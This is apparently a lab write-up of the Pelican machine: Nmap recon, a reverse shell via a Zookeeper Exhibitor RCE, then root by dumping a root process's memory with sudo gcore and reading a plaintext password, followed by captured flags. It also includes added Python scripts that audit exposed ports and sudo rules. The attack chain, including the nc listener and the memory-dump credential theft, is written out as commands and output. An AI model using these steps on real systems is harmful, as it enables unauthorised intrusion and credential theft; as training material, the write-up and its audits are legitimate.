Key takeaways
- When there is a lot of information, search through it patiently
- Zookeeper Exhibitor RCE vulnerability
Detailed steps
As usual, start by running Nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 22:44 UTC
Nmap scan report for 192.168.54.98
Host is up (0.00090s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_ 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
|_http-title: Forbidden - CUPS v2.2.10
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
2181/tcp open zookeeper Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_ 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
8080/tcp open http Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
8081/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://192.168.54.98:8080/exhibitor/v1/ui/index.html
34051/tcp open java-rmi Java RMI
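Before deciding where to look, a defender reading this scan would want the exposure inventoried rather than eyeballed. The following Python script is an added example and not part of the original writeup: it parses the Nmap normal-output block above into records (the port and ssh-hostkey lines are copied from the scan), lists every open port outside an assumed, hypothetical baseline of {22}, and reports host-key fingerprints presented on more than one port, which here shows that the SSH services on 22 and 2222 use the same keypair.

```python
import re
from collections import defaultdict

# Nmap normal-output lines copied from the scan in the writeup above
# (script output other than the ssh-hostkey lines is omitted).
NMAP_OUTPUT = """\
Nmap scan report for 192.168.54.98
Host is up (0.00090s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_ 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
2181/tcp open zookeeper Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_ 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
8080/tcp open http Jetty 1.0
8081/tcp open http nginx 1.14.2
34051/tcp open java-rmi Java RMI
"""

# "<port>/<proto> <state> <service> <version...>" as printed by nmap -sV.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| 2048 aa:bb:...:ff (RSA)" lines emitted by the ssh-hostkey script.
HOSTKEY_LINE = re.compile(r"^\|_?\s*\d+\s+([0-9a-f]{2}(?::[0-9a-f]{2}){15})\s+\((\w+)\)")

# Assumed baseline: the only port the host owner expects to be reachable.
EXPECTED_PORTS = {22}


def parse_nmap(text):
    """Return one record per open port; host-key lines that follow a port
    line are attached to that port as (key type, fingerprint) pairs."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = {"port": int(port), "proto": proto, "state": state,
                       "service": service, "version": version.strip(),
                       "hostkeys": []}
            if state == "open":
                records.append(current)
            continue
        h = HOSTKEY_LINE.match(line)
        if h and current is not None:
            current["hostkeys"].append((h.group(2), h.group(1)))
    return records


def unexpected_exposure(records, expected=EXPECTED_PORTS):
    """Open ports that are not in the expected baseline."""
    return [r for r in records if r["port"] not in expected]


def shared_hostkeys(records):
    """Map each host-key fingerprint seen on more than one port to the sorted
    list of ports presenting it: one sshd (or a container cloned with the
    host's keys) reachable on several ports."""
    by_fp = defaultdict(set)
    for r in records:
        for _ktype, fp in r["hostkeys"]:
            by_fp[fp].add(r["port"])
    return {fp: sorted(ports) for fp, ports in by_fp.items() if len(ports) > 1}


if __name__ == "__main__":
    recs = parse_nmap(NMAP_OUTPUT)
    for r in unexpected_exposure(recs):
        print(f"unexpected: {r['port']}/{r['proto']} {r['service']} {r['version']}")
    for fp, ports in shared_hostkeys(recs).items():
        print(f"host key {fp} shared by ports {ports}")
```

Run against the scan above, the baseline check lists eight ports the owner did not plan on, and the shared-key check reports all three SSH fingerprints on both 22 and 2222.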
I spent some time looking up each service one by one, and eventually found that http://192.168.215.98:8080/exhibitor/v1/ui/index.html has an RCE vulnerability (https://kashz.gitbook.io/kashz-jewels/services/zookeeper-exhibitor). After starting nc -nlvp 80 locally, I changed the settings as shown in the figure below and got a reverse shell and the first flag.
C:\home\kali\Documents\OFFSEC\GoToWork\Pelican> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.215.98] 44080
id
uid=1000(charles) gid=1000(charles) groups=1000(charles)
pwd
/opt/zookeeper
cd /home
ls -l
total 4
drwxr-xr-x 3 charles charles 4096 Sep 10 2020 charles
cd charles
ls -l
total 4
-rw-r--r-- 1 charles charles 33 Oct 13 18:49 local.txt
cat local.txt
150f6cb4c2aeb41502e3e2785af704ed
Next, check SUID binaries and sudo -l, which give respectively
find / -type f -perm -4000 2>/dev/null
......
......
/usr/bin/password-store
......
......
and
sudo -l
Matching Defaults entries for charles on pelican:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore
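The sudo rule above is the root cause of everything that follows: a NOPASSWD rule for a tool whose job is to read other processes' memory is equivalent to handing out root. The following Python script is an added example rather than anything from the writeup: it parses sudo -l output (the pelican rules copied from above, plus two constructed lines, an apt-get rule that still requires a password and a catch-all NOPASSWD ALL rule, to show what is and is not flagged) and reports rules that grant process-memory access or unrestricted commands, noting when no password is required. The MEMORY_DUMP_TOOLS list is an assumption for this audit, not something sudo itself knows about.

```python
import re

# sudo -l output copied from the writeup above, plus two constructed rules
# (apt-get with a password, and a catch-all NOPASSWD ALL) to show what the
# audit does and does not flag.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore
    (root) /usr/bin/apt-get update
    (ALL) NOPASSWD: ALL
"""

# One "(runas) [TAG: ...] command" line as printed by sudo -l.
RULE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Assumed list of binaries whose purpose is to read other processes' memory;
# run as root, each exposes every secret a root-owned service keeps in RAM.
MEMORY_DUMP_TOOLS = {"gcore", "gdb"}


def parse_sudo_l(text):
    """Return the command rules from sudo -l output as dicts; the Defaults
    block before the 'may run the following commands' line is ignored."""
    rules = []
    in_cmds = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        if not in_cmds or not line:
            continue
        m = RULE.match(line)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        rules.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "command": cmd,
            # bare program name, e.g. "gcore" from "/usr/bin/gcore"
            "binary": cmd.split()[0].rsplit("/", 1)[-1],
        })
    return rules


def audit(rules):
    """Return (command, reasons) pairs for rules that deserve review."""
    findings = []
    for r in rules:
        reasons = []
        if r["command"] == "ALL":
            reasons.append("unrestricted command")
        if r["binary"] in MEMORY_DUMP_TOOLS:
            reasons.append("can dump process memory of root-owned services")
        if reasons and r["nopasswd"]:
            reasons.append("no password required")
        if reasons:
            findings.append((r["command"], reasons))
    return findings


if __name__ == "__main__":
    for command, reasons in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"{command}: {'; '.join(reasons)}")
```

Run against the sample, the gcore rule and the constructed ALL rule are reported, each with the note that no password is required; the apt-get rule is left alone. The same parser works on the output of sudo -l -U <user> collected from a fleet, which is the cheap way to catch a rule like this before a machine like pelican is built.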
Looking at the /usr/bin/gcore script, it appears to be able to dump process memory:
https://wiki.sentnl.io/security/hacking-demos/getting-passwords-of-logged-in-users
I tried looking for processes related to "password" and did not find much, so I started /usr/bin/password-store and then dumped its process memory
ps -aef | grep password
root 513 1 0 18:46 ? 00:00:00 /usr/bin/password-store
root 15611 1 0 19:39 ? 00:00:00 /usr/bin/password-store -help
charles 15745 11245 0 19:40 ? 00:00:00 grep password
sudo /usr/bin/gcore 513
0x00007f971bd1c6f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffc3d7a2c80, remaining=remaining@entry=0x7ffc3d7a2c80) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
Saved corefile core.513
[Inferior 1 (process 513) detached]
ls -l
total 155828
-rw-r--r-- 1 root root 154185840 Oct 13 19:21 core.1
-rw-r--r-- 1 root root 3148192 Oct 13 19:22 core.1322
-rw-r--r-- 1 root root 1861600 Oct 13 19:31 core.466
-rw-r--r-- 1 root root 354448 Oct 13 19:40 core.513
-rw-r--r-- 1 charles charles 33 Oct 13 18:49 local.txt
Interesting information turns up
strings core.513
001 Password: root:
ClogKingpinInning731
Spawn a full PTY with Python, then su root to get root privileges
whereis python
python: /usr/bin/python /usr/bin/python3.7 /usr/bin/python2.7 /usr/bin/python3.7m /usr/lib/python3.7 /usr/lib/python2.7 /etc/python /etc/python3.7 /etc/python2.7 /usr/local/lib/python3.7 /usr/local/lib/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz
/usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
charles@pelican:~$ su root
su root
Password: ClogKingpinInning731
root@pelican:/home/charles# id
id
uid=0(root) gid=0(root) groups=0(root)
root@pelican:/home/charles# cat /root/proof.txt
cat /root/proof.txt
c82d1cafd57e2e2685beba1998f9cf9c